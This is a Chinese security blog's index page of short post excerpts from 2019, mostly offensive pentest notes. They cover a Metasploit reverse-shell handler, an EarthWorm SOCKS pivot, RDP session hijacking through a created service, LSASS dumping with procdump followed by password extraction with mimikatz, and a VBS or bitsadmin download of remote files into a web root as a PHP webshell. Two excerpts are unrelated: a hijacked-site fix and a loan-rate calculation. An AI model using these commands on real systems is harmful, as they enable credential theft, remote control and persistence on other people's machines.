powershell反弹shell 的几种方法

2019年07月20日  No comment

    如果想接收多个sessions的话,用msf执行以下命令进行监听    反弹成功以后,用sessions id 来选择要操作的目标    NC反弹msfconsole use exploit/multi/hanler set payload windows/shell/reverse_tcp set lhost 1
阅读全文 »

EarthWorm详细用法

2019年07月17日  No comment

正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »

RDP劫持会话

2019年07月16日  No comment

RDP劫持会话sc create sesshijack binpath="cmd.exe /k tscon 1 /dest:rdp-tcp#46"1为要劫持的会话ID     dest为 sessionname net start sesshijack参考链接https://www.youtube.com/watch?v=OgsoIoWmhWw
阅读全文 »

用Procdump获取win密码

2019年07月16日  No comment

    Procdump出win密码procdump64.exe -accepteula -ma lsass.exe lsass.dmp将导出的日志利用 mimikatz 进行破解mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" 
阅读全文 »

常用的远程下载方法

2019年07月11日  No comment

常用的远程下载方法针对某些服务器禁止上传vbs下载文件Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.xxx.com/2.exe",0 Post.Send() Set
阅读全文 »

Bitsadmin 命令用法

2019年07月11日  No comment

bitsadmin 命令 传说这个命令的参数特别多 细说能写一本书那么厚记几个常用的就行了bitsadmin /transfer n http://www.xxx.com/1.txt d:\wwwroot\1.php   //下载1.txt到d盘命名为1.phpbitsadmin /list /verbose       &nb
阅读全文 »

Kali常用命令整理!更新中

2019年07月10日  No comment

kali 配置SSH修改sshd_configvi /etc/ssh/sshd_config将#PasswordAuthentication on 改为 yes将PermitRootLogin without-password 改为 PermitRootLogin yes启动ssh/etc/init.d/ssh start或者 service ssh start查看是否启动/etc/init.d/ssh statusservice ssh status设置ssh自启动update-rc
阅读全文 »

dede主页老是被篡改

2019年06月11日  No comment

    朋友公司的网站最近被劫持了跳转到了赌博网站,再三检查没有发现异常 如图网站被劫持后的      在三检查发现网站被加入了自定义标签 {dede:mytag typeid='0' name=''/}        解决办法:/dede/目录下  删除自定义标签管理  &n
阅读全文 »

用EXCEL表IRR公式计算你的贷款利率

2019年06月09日  No comment

用EXCEL表IRR公式计算你的贷款利率 日常生活中可用于计算房贷、车贷、信用卡分期、支付宝花呗等 防止被强制缴纳智商税。 以15000为例子 分期24期 每期还款677.5 计算公式为 =IRR(B2:B26)*24 结果是16% 这个结果不算太高 然后计算月利率calc 一波操作 16%/12=1.33% 日利率 16%/360=0.044  然后计算每日金额
阅读全文 »

Windows Server 2012的小问题

2019年06月09日  No comment

  Windows Server 2012的小问题 其实也不算是一个小问题 看似不起眼 对win12 没有研究 在目标服务器上看到的就记录下  win2012 居然可以不需要账号密码可以进行远程关机 重启 直接让目标服务器duang掉  这波操作很6
阅读全文 »